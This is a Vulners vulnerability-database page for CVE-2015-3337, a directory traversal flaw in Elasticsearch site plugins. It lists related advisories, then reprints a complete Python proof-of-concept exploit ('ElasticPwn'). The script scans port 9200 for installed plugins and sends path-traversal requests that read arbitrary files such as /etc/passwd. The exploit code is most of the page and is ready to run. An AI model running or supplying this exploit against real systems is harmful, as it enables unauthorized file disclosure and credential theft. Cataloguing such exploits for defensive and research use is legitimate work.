Vulners
Lucene search
ElasticSearch 1.4.5 / 1.5.2 - Path Transversal Vulnerability
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | elasticsearch -- directory traversal attack with site plugins | 27 Apr 201500:00 | – | freebsd |
 | CVE-2015-3337 | 6 Dec 202313:16 | – | circl |
 | Elasticsearch Arbitrary File Disclosure Vulnerability | 30 Apr 201500:00 | – | cnvd |
 | CVE-2015-3337 | 1 May 201515:00 | – | cve |
 | CVE-2015-3337 | 1 May 201515:00 | – | cvelist |
 | [SECURITY] [DSA 3241-1] elasticsearch security update | 29 Apr 201520:32 | – | debian |
 | Debian DSA-3241-1 : elasticsearch - security update | 30 Apr 201500:00 | – | nessus |
| FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5) | 26 Jun 201500:00 | – | nessus |
 | ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | 18 May 201500:00 | – | exploitdb |
 | ElasticSearch 1.4.5 1.5.2 - Directory Traversal | 18 May 201500:00 | – | exploitpack |
10
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
import socket, sys
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to %s: %s" % (host, e)
sys.exit()
# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
for plugin in pluginList:
pfind(plugin)
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 May 2015 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.91087